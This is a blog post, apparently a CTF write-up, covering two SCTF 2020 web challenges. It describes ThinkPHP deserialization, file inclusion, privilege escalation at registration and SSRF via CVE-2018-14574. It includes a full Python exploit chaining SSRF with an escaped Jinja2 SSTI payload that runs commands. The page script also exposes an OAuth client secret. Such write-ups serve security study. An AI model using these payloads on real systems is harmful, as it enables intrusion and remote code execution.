<!DOCTYPE html>
<html lang=zh>
<head>
    <!-- so meta -->
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="HandheldFriendly" content="True">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=5" />
    <meta name="description" content="UnsafeDefenseSystem PHP&#x2F;5.6.26, tp 5.0.24 经过一番吐血的信息搜集，看到了这个破静态站的源码里竟然有注释   我要对出题人使出极限一换一  访问&#x2F;protect.py能看到一个超长的憨批监控脚本，其实也不用看 在静态站注释提示的&#x2F;public&#x2F;nationalsb&#x2F;login.php的注释中又看到了关于密码的提示  通过爆破得到用户名密码： 12Admin1">
<meta property="og:type" content="article">
<meta property="og:title" content="SCTF 2020 两道Web题 Writeup">
<meta property="og:url" content="https://blog.frankli.site/2020/07/07/Security/Writeup/SCTF-2020-Web/index.html">
<meta property="og:site_name" content="Frank">
<meta property="og:description" content="UnsafeDefenseSystem PHP&#x2F;5.6.26, tp 5.0.24 经过一番吐血的信息搜集，看到了这个破静态站的源码里竟然有注释   我要对出题人使出极限一换一  访问&#x2F;protect.py能看到一个超长的憨批监控脚本，其实也不用看 在静态站注释提示的&#x2F;public&#x2F;nationalsb&#x2F;login.php的注释中又看到了关于密码的提示  通过爆破得到用户名密码： 12Admin1">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://blog.frankli.site/2020/07/07/Security/Writeup/SCTF-2020-Web/hint.png">
<meta property="og:image" content="https://blog.frankli.site/2020/07/07/Security/Writeup/SCTF-2020-Web/passwd_hint.png">
<meta property="og:image" content="https://blog.frankli.site/2020/07/07/Security/Writeup/SCTF-2020-Web/entry.png">
<meta property="og:image" content="https://blog.frankli.site/2020/07/07/Security/Writeup/SCTF-2020-Web/phpinfo.png">
<meta property="og:image" content="https://blog.frankli.site/2020/07/07/Security/Writeup/SCTF-2020-Web/create_user.png">
<meta property="article:published_time" content="2020-07-06T16:00:00.000Z">
<meta property="article:modified_time" content="2021-04-11T21:37:38.000Z">
<meta property="article:author" content="Frank Li">
<meta property="article:tag" content="CTF">
<meta property="article:tag" content="Writeup">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://blog.frankli.site/2020/07/07/Security/Writeup/SCTF-2020-Web/hint.png">
    
    
      
        
          <link rel="shortcut icon" href="/images/favicon.ico">
        
      
      
        
          <link rel="icon" type="image/png" href="/images/favicon-192x192.png" sizes="192x192">
        
      
      
        
          <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon.png">
        
      
    
    <!-- title -->
    <title>SCTF 2020 两道Web题 Writeup</title>
    <!-- styles -->
    
<link rel="stylesheet" href="/css/style.css">

    <!-- persian styles -->
    
    <!-- rss -->
    
    
<!-- hexo injector head_end start -->
<style>
    .card {
        border-radius: 5px;
        border: 1px solid;
        border-color: #eee #ddd #bbb;
        box-shadow: rgba(0,0,0,.14) 0 1px 3px;
        text-align: center;  
        float: left;
        padding: 10px;
        margin: 10px;
    }
    .card .avatar {
        display: block;
        width: calc(100% - 20px);
        height: calc(100% - 20px);
        align-content: center;
        margin: auto
    }
    .card .title { white-space: nowrap; }
    @media screen and (max-width: 480px) {
        .card { width: calc(33% - 20px); }
    }
    @media screen and (max-width: 600px) and (min-width: 481px) {
        .card { width: calc(25% - 20px); }
    }
    @media screen and (min-width: 601px) {
        .card { width: calc(20% - 20px); }
    }
    .card-container { width: 90%; }
</style><!-- hexo injector head_end end --><meta name="generator" content="Hexo 5.4.0"><link rel="alternate" href="/atom.xml" title="Frank" type="application/atom+xml">
</head>

<body class="max-width mx-auto px3 ltr">
    
      <div id="header-post">
  <a id="menu-icon" href="#" aria-label="icons.menu"><i class="fas fa-bars fa-lg"></i></a>
  <a id="menu-icon-tablet" href="#" aria-label="icons.menu"><i class="fas fa-bars fa-lg"></i></a>
  <a id="top-icon-tablet" href="#" "icons.top" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');" style="display:none;"><i class="fas fa-chevron-up fa-lg"></i></a>
  <span id="menu">
    <span id="nav">
      <ul>
         
          <li><a href="/">首页</a></li>
         
          <li><a href="/about/">关于</a></li>
         
          <li><a href="/archives/">归档</a></li>
         
          <li><a href="/friends/">友链</a></li>
        
      </ul>
    </span>
    <br/>
    <span id="actions">
      <ul>
        
        <li><a class="icon" aria-label="上一篇 " href="/2020/08/05/Security/php-src/WMCTF2020-PHP-source-analysis/"><i class="fas fa-chevron-left" aria-hidden="true" onmouseover="$('#i-prev').toggle();" onmouseout="$('#i-prev').toggle();"></i></a></li>
        
        
        <li><a class="icon" aria-label="下一篇 " href="/2020/05/20/Misc/%E5%85%B3%E4%BA%8E%E7%88%B1/"><i class="fas fa-chevron-right" aria-hidden="true" onmouseover="$('#i-next').toggle();" onmouseout="$('#i-next').toggle();"></i></a></li>
        
        <li><a class="icon" aria-label="返回顶部 " href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fas fa-chevron-up" aria-hidden="true" onmouseover="$('#i-top').toggle();" onmouseout="$('#i-top').toggle();"></i></a></li>
        <li><a class="icon" aria-label="分享文章 " href="#"><i class="fas fa-share-alt" aria-hidden="true" onmouseover="$('#i-share').toggle();" onmouseout="$('#i-share').toggle();" onclick="$('#share').toggle();return false;"></i></a></li>
      </ul>
      <span id="i-prev" class="info" style="display:none;">上一篇</span>
      <span id="i-next" class="info" style="display:none;">下一篇</span>
      <span id="i-top" class="info" style="display:none;">返回顶部</span>
      <span id="i-share" class="info" style="display:none;">分享文章</span>
    </span>
    <br/>
    <div id="share" style="display: none">
      <ul>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.facebook.com/sharer.php?u=https://blog.frankli.site/2020/07/07/Security/Writeup/SCTF-2020-Web/"><i class="fab fa-facebook " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://twitter.com/share?url=https://blog.frankli.site/2020/07/07/Security/Writeup/SCTF-2020-Web/&text=SCTF 2020 两道Web题 Writeup"><i class="fab fa-twitter " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.linkedin.com/shareArticle?url=https://blog.frankli.site/2020/07/07/Security/Writeup/SCTF-2020-Web/&title=SCTF 2020 两道Web题 Writeup"><i class="fab fa-linkedin " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://pinterest.com/pin/create/bookmarklet/?url=https://blog.frankli.site/2020/07/07/Security/Writeup/SCTF-2020-Web/&is_video=false&description=SCTF 2020 两道Web题 Writeup"><i class="fab fa-pinterest " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=SCTF 2020 两道Web题 Writeup&body=Check out this article: https://blog.frankli.site/2020/07/07/Security/Writeup/SCTF-2020-Web/"><i class="fas fa-envelope " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://getpocket.com/save?url=https://blog.frankli.site/2020/07/07/Security/Writeup/SCTF-2020-Web/&title=SCTF 2020 两道Web题 Writeup"><i class="fab fa-get-pocket " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://reddit.com/submit?url=https://blog.frankli.site/2020/07/07/Security/Writeup/SCTF-2020-Web/&title=SCTF 2020 两道Web题 Writeup"><i class="fab fa-reddit " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.stumbleupon.com/submit?url=https://blog.frankli.site/2020/07/07/Security/Writeup/SCTF-2020-Web/&title=SCTF 2020 两道Web题 Writeup"><i class="fab fa-stumbleupon " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://digg.com/submit?url=https://blog.frankli.site/2020/07/07/Security/Writeup/SCTF-2020-Web/&title=SCTF 2020 两道Web题 Writeup"><i class="fab fa-digg " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.tumblr.com/share/link?url=https://blog.frankli.site/2020/07/07/Security/Writeup/SCTF-2020-Web/&name=SCTF 2020 两道Web题 Writeup&description="><i class="fab fa-tumblr " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://news.ycombinator.com/submitlink?u=https://blog.frankli.site/2020/07/07/Security/Writeup/SCTF-2020-Web/&t=SCTF 2020 两道Web题 Writeup"><i class="fab fa-hacker-news " aria-hidden="true"></i></a></li>
</ul>

    </div>
    <div id="toc">
      <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#UnsafeDefenseSystem"><span class="toc-number">1.</span> <span class="toc-text">UnsafeDefenseSystem</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#jsonhub"><span class="toc-number">2.</span> <span class="toc-text">jsonhub</span></a></li></ol>
    </div>
  </span>
</div>

    
    <div class="content index py4">
        
        <article class="post" itemscope itemtype="http://schema.org/BlogPosting">
  <header>
    
    <h1 class="posttitle" itemprop="name headline">
        SCTF 2020 两道Web题 Writeup
    </h1>



    <div class="meta">
      <span class="author" itemprop="author" itemscope itemtype="http://schema.org/Person">
        <span itemprop="name">Frank Li</span>
      </span>
      
    <div class="postdate">
      
        <time datetime="2020-07-06T16:00:00.000Z" itemprop="datePublished">2020-07-07</time>
        
      
    </div>


      

      
    <div class="article-tag">
        <i class="fas fa-tag"></i>
        <a class="tag-link-link" href="/tags/CTF/" rel="tag">CTF</a>, <a class="tag-link-link" href="/tags/Writeup/" rel="tag">Writeup</a>
    </div>


    </div>
  </header>
  

  <div class="content" itemprop="articleBody">
    <h2 id="UnsafeDefenseSystem">UnsafeDefenseSystem</h2>
<p>PHP/5.6.26, tp 5.0.24<br>
经过一番吐血的信息搜集，看到了这个破静态站的源码里竟然有注释</p>
<img src="/2020/07/07/Security/Writeup/SCTF-2020-Web/hint.png" class="" title="hint in comment">
<blockquote>
<p>我要对出题人使出极限一换一</p>
</blockquote>
<p>访问/protect.py能看到一个超长的憨批监控脚本，其实也不用看<br>
在静态站注释提示的/public/nationalsb/login.php的注释中又看到了关于密码的提示</p>
<img src="/2020/07/07/Security/Writeup/SCTF-2020-Web/passwd_hint.png" class="" title="passwd_hint">
<p>通过爆破得到用户名密码：</p>
<figure class="highlight text"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">Admin1964752</span><br><span class="line">DsaPPPP!@#amspe1221</span><br></pre></td></tr></table></figure>
<p>后台存在lfi。经过一番读文件，看到index controller中存在反序列化点</p>
<img src="/2020/07/07/Security/Writeup/SCTF-2020-Web/entry.png" class="" title="unserialize entry">
<p>结合上文所知道的thinkphp版本可以搜到:</p>
<p><a target="_blank" rel="noopener" href="https://althims.com/2020/02/07/thinkphp-5-0-24-unserialize/">https://althims.com/2020/02/07/thinkphp-5-0-24-unserialize/</a><br>
<a target="_blank" rel="noopener" href="https://xz.aliyun.com/t/7594">https://xz.aliyun.com/t/7594</a></p>
<p><a target="_blank" rel="noopener" href="http://xn--protect-gq4kgoltk9x2jgvm3c8kpghez02h8zvad37bkmqos5b.py">出题人可能是想让条件竞争过protect.py</a>，但是实际上我们可以往/tmp目录底下写文件，并且在nationalsb那里包含这一文件，最终拿到shell</p>
<img src="/2020/07/07/Security/Writeup/SCTF-2020-Web/phpinfo.png" class="" title="phpinfo">
<h2 id="jsonhub">jsonhub</h2>
<p>白盒审计。对外开放的是web1，一个Django服务，内网还有个flask。</p>
<p>首先整理思路：首先要过那个django的token，然后ssrf请求flask_rpc，这样才能带上Content-Type发POST请求</p>
<img src="/2020/07/07/Security/Writeup/SCTF-2020-Web/create_user.png" class="" title="User creation flaw">
<p>很明显，注册的时候参数完全可控，也就是说可以伪造管理员身份。将两个字段，<code>is_superuser</code>与<code>is_staff</code>都设置为True，就能访问 <code>http://39.104.19.182/admin/app/token/</code> 拿到token了。</p>
<p>在请求后方flask服务前，django服务对<code>REMOTE_URL</code>进行了验证。由于题目部署在了docker里，访问公网ip时<code>REMOTE_URL</code>实际上是172.多少多少（即使不在docker里也是公网ip）。</p>
<p><a target="_blank" rel="noopener" href="https://xz.aliyun.com/t/3302">https://xz.aliyun.com/t/3302</a><br>
利用CVE-2018-14574漏洞进行跳转即可</p>
<p>再看第二个服务：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">@app.before_request</span></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">before_request</span>():</span></span><br><span class="line">    data = <span class="built_in">str</span>(request.data)</span><br><span class="line">    log()</span><br><span class="line">    <span class="keyword">if</span> <span class="string">&quot;&#123;&#123;&quot;</span> <span class="keyword">in</span> data <span class="keyword">or</span> <span class="string">&quot;&#125;&#125;&quot;</span> <span class="keyword">in</span> data <span class="keyword">or</span> <span class="string">&quot;&#123;%&quot;</span> <span class="keyword">in</span> data <span class="keyword">or</span> <span class="string">&quot;%&#125;&quot;</span> <span class="keyword">in</span> data:</span><br><span class="line">        abort(<span class="number">401</span>)</span><br><span class="line">...</span><br><span class="line">    json.loads(...)</span><br></pre></td></tr></table></figure>
<p>python中的json模块在解析json时会自动将转义过的字符恢复，所以可以用<code>&quot;\u007b&quot;</code>来绕过<code>before_request</code><br>
关于表达式的正则过滤，由于对符号的过滤不严格导致了一个非预期，甚至完全不需要管num1和num2：</p>
<p>exploit:</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> requests <span class="keyword">import</span> Request, session, get, post</span><br><span class="line"><span class="keyword">from</span> bs4 <span class="keyword">import</span> BeautifulSoup</span><br><span class="line"><span class="keyword">from</span> base64 <span class="keyword">import</span> b64encode</span><br><span class="line"><span class="keyword">import</span> json</span><br><span class="line">HOST = <span class="string">&#x27;http://39.104.19.182&#x27;</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line">ses = session()</span><br><span class="line">USER = <span class="string">&#x27;frkasdf&#x27;</span></span><br><span class="line">PASS = <span class="string">&#x27;qwer&#x27;</span></span><br><span class="line"></span><br><span class="line"><span class="comment"># session 默认keep-alive，这个服务端好像有点连接性问题，所以单独请求</span></span><br><span class="line">post(HOST + <span class="string">&#x27;/reg/&#x27;</span>, json=&#123;</span><br><span class="line">    <span class="string">&#x27;username&#x27;</span>: USER,</span><br><span class="line">    <span class="string">&#x27;password&#x27;</span>: PASS,</span><br><span class="line">    <span class="string">&#x27;is_staff&#x27;</span>: <span class="literal">True</span>,</span><br><span class="line">    <span class="string">&#x27;is_superuser&#x27;</span>: <span class="literal">True</span></span><br><span class="line">&#125;).json()[<span class="string">&#x27;code&#x27;</span>]</span><br><span class="line"></span><br><span class="line">ses.post(HOST + <span class="string">&#x27;/login/&#x27;</span>, json=&#123;</span><br><span class="line">    <span class="string">&#x27;username&#x27;</span>: USER,</span><br><span class="line">    <span class="string">&#x27;password&#x27;</span>: PASS,</span><br><span class="line">&#125;)</span><br><span class="line"></span><br><span class="line">page = BeautifulSoup(get(</span><br><span class="line">    HOST + <span class="string">&#x27;/admin/app/token/&#x27;</span>, cookies=ses.cookies</span><br><span class="line">).text, <span class="string">&#x27;lxml&#x27;</span>)</span><br><span class="line">token = page.find(<span class="string">&#x27;td&#x27;</span>, attrs=&#123;<span class="string">&#x27;class&#x27;</span>: <span class="string">&#x27;field-Token&#x27;</span>&#125;).text</span><br><span class="line"></span><br><span class="line">ssti = <span class="string">&#x27;&#123;&#123;config.__class__.__init__.__globals__[&quot;os&quot;].popen(&quot;/readflag&quot;).read() + &quot;&quot;&#125;&#125;&#x27;</span></span><br><span class="line"></span><br><span class="line">payload = (<span class="string">&#x27;&#123;&#x27;</span> + json.dumps(&#123;</span><br><span class="line">    <span class="string">&#x27;num1&#x27;</span>: <span class="string">&#x27;&#x27;</span>, <span class="string">&#x27;num2&#x27;</span>: <span class="string">&#x27;&#x27;</span>, <span class="string">&#x27;symbols&#x27;</span>: ssti,</span><br><span class="line">&#125;)[<span class="number">1</span>:-<span class="number">1</span>].replace(<span class="string">&#x27;&#123;&#x27;</span>, <span class="string">&#x27;\\u007b&#x27;</span>).replace(<span class="string">&#x27;&#125;&#x27;</span>, <span class="string">&#x27;\\u007d&#x27;</span>) + <span class="string">&#x27;&#125;&#x27;</span>)</span><br><span class="line"></span><br><span class="line">payload = b64encode(payload.encode()).decode()</span><br><span class="line"></span><br><span class="line">req = Request(<span class="string">&#x27;GET&#x27;</span>, HOST + <span class="string">&#x27;//127.0.0.1:8000/flask_rpc&#x27;</span>, params=&#123;</span><br><span class="line">    <span class="string">&#x27;methods&#x27;</span>: <span class="string">&#x27;POST&#x27;</span>,</span><br><span class="line">    <span class="string">&#x27;url&#x27;</span>: <span class="string">&#x27;http://localhost:5000/caculator&#x27;</span>,</span><br><span class="line">    <span class="comment"># flask在:5000</span></span><br><span class="line">    <span class="string">&#x27;data&#x27;</span>: payload</span><br><span class="line">&#125;).prepare()</span><br><span class="line"></span><br><span class="line"><span class="built_in">print</span>(json.loads(ses.post(HOST + <span class="string">&#x27;/home/&#x27;</span>, json=&#123;</span><br><span class="line">    <span class="string">&#x27;url&#x27;</span>: req.url,</span><br><span class="line">    <span class="string">&#x27;token&#x27;</span>: token</span><br><span class="line">&#125;).json()[<span class="string">&#x27;message&#x27;</span>])[<span class="string">&#x27;message&#x27;</span>])</span><br></pre></td></tr></table></figure>

<div id="gitalk-container"></div>
<script src="https://cdn.bootcss.com/blueimp-md5/2.12.0/js/md5.min.js"></script><link rel="stylesheet" href="https://unpkg.com/gitalk/dist/gitalk.css"><script src="https://unpkg.com/gitalk/dist/gitalk.min.js"></script>

		<script>
		var gitalkConfig = {"clientID":"5955d155fe2ea768241e","clientSecret":"f96bbda9ff434950217f24f7f9369f8b8de3b025","repo":"frankli0324.github.io","owner":"frankli0324","admin":["frankli0324"],"distractionFreeMode":false};
	    gitalkConfig.id = md5(location.pathname);
		var gitalk = new Gitalk(gitalkConfig);
	    gitalk.render("gitalk-container");
	    </script><link rel="stylesheet" href="/css/spoiler.css" type="text/css"><script src="/js/spoiler.js" type="text/javascript" async></script>
  </div>
</article>




        
          <div id="footer-post-container">
  <div id="footer-post">

    <div id="nav-footer" style="display: none">
      <ul>
         
          <li><a href="/">首页</a></li>
         
          <li><a href="/about/">关于</a></li>
         
          <li><a href="/archives/">归档</a></li>
         
          <li><a href="/friends/">友链</a></li>
        
      </ul>
    </div>

    <div id="toc-footer" style="display: none">
      <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#UnsafeDefenseSystem"><span class="toc-number">1.</span> <span class="toc-text">UnsafeDefenseSystem</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#jsonhub"><span class="toc-number">2.</span> <span class="toc-text">jsonhub</span></a></li></ol>
    </div>

    <div id="share-footer" style="display: none">
      <ul>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.facebook.com/sharer.php?u=https://blog.frankli.site/2020/07/07/Security/Writeup/SCTF-2020-Web/"><i class="fab fa-facebook fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://twitter.com/share?url=https://blog.frankli.site/2020/07/07/Security/Writeup/SCTF-2020-Web/&text=SCTF 2020 两道Web题 Writeup"><i class="fab fa-twitter fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.linkedin.com/shareArticle?url=https://blog.frankli.site/2020/07/07/Security/Writeup/SCTF-2020-Web/&title=SCTF 2020 两道Web题 Writeup"><i class="fab fa-linkedin fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://pinterest.com/pin/create/bookmarklet/?url=https://blog.frankli.site/2020/07/07/Security/Writeup/SCTF-2020-Web/&is_video=false&description=SCTF 2020 两道Web题 Writeup"><i class="fab fa-pinterest fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=SCTF 2020 两道Web题 Writeup&body=Check out this article: https://blog.frankli.site/2020/07/07/Security/Writeup/SCTF-2020-Web/"><i class="fas fa-envelope fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://getpocket.com/save?url=https://blog.frankli.site/2020/07/07/Security/Writeup/SCTF-2020-Web/&title=SCTF 2020 两道Web题 Writeup"><i class="fab fa-get-pocket fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://reddit.com/submit?url=https://blog.frankli.site/2020/07/07/Security/Writeup/SCTF-2020-Web/&title=SCTF 2020 两道Web题 Writeup"><i class="fab fa-reddit fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.stumbleupon.com/submit?url=https://blog.frankli.site/2020/07/07/Security/Writeup/SCTF-2020-Web/&title=SCTF 2020 两道Web题 Writeup"><i class="fab fa-stumbleupon fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://digg.com/submit?url=https://blog.frankli.site/2020/07/07/Security/Writeup/SCTF-2020-Web/&title=SCTF 2020 两道Web题 Writeup"><i class="fab fa-digg fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.tumblr.com/share/link?url=https://blog.frankli.site/2020/07/07/Security/Writeup/SCTF-2020-Web/&name=SCTF 2020 两道Web题 Writeup&description="><i class="fab fa-tumblr fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://news.ycombinator.com/submitlink?u=https://blog.frankli.site/2020/07/07/Security/Writeup/SCTF-2020-Web/&t=SCTF 2020 两道Web题 Writeup"><i class="fab fa-hacker-news fa-lg" aria-hidden="true"></i></a></li>
</ul>

    </div>

    <div id="actions-footer">
        <a id="menu" class="icon" href="#" onclick="$('#nav-footer').toggle();return false;"><i class="fas fa-bars fa-lg" aria-hidden="true"></i> 菜单</a>
        <a id="toc" class="icon" href="#" onclick="$('#toc-footer').toggle();return false;"><i class="fas fa-list fa-lg" aria-hidden="true"></i> 目录</a>
        <a id="share" class="icon" href="#" onclick="$('#share-footer').toggle();return false;"><i class="fas fa-share-alt fa-lg" aria-hidden="true"></i> 分享</a>
        <a id="top" style="display:none" class="icon" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fas fa-chevron-up fa-lg" aria-hidden="true"></i> 返回顶部</a>
    </div>

  </div>
</div>

        
        <footer id="footer">
  <div class="footer-left">
    Copyright &copy;
    
    
    2017-2021
    Frank Li
  </div>
  <div class="footer-right">
    <nav>
      <ul>
         
          <li><a href="/">首页</a></li>
         
          <li><a href="/about/">关于</a></li>
         
          <li><a href="/archives/">归档</a></li>
         
          <li><a href="/friends/">友链</a></li>
        
      </ul>
    </nav>
  </div>
</footer>

    </div>
    <!-- styles -->



  <link rel="preload" as="style" href="https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free@5.15.3/css/all.min.css" crossorigin="anonymous" onload="this.onload=null;this.rel='stylesheet'"/>


    <!-- jquery -->
 
  <script src="https://cdn.jsdelivr.net/npm/jquery@3.6.0/dist/jquery.min.js" crossorigin="anonymous"></script> 




<!-- clipboard -->

  
    <script src="https://cdn.jsdelivr.net/npm/clipboard@2.0.8/dist/clipboard.min.js" crossorigin="anonymous"></script> 
  
  <script type="text/javascript">
  $(function() {
    // copy-btn HTML
    var btn = "<span class=\"btn-copy tooltipped tooltipped-sw\" aria-label=\"复制到粘贴板!\">";
    btn += '<i class="far fa-clone"></i>';
    btn += '</span>'; 
    // mount it!
    $(".highlight table").before(btn);
    var clip = new ClipboardJS('.btn-copy', {
      text: function(trigger) {
        return Array.from(trigger.nextElementSibling.querySelectorAll('.code')).reduce((str,it)=>str+it.innerText+'\n','')
      }
    });
    clip.on('success', function(e) {
      e.trigger.setAttribute('aria-label', "复制成功!");
      e.clearSelection();
    })
  })
  </script>


<script src="/js/main.js"></script>

<!-- search -->

<!-- Google Analytics -->

    <script async src="https://www.googletagmanager.com/gtag/js?id=UA-131292248-2"></script>
    <script>
        window.dataLayer = window.dataLayer || [];
        function gtag(){dataLayer.push(arguments);}
        gtag('js', new Date());
        gtag('config', 'UA-131292248-2');
    </script>

<!-- Baidu Analytics -->

<!-- Cloudflare Analytics -->

<!-- Umami Analytics -->

<!-- Disqus Comments -->


</body>
</html>
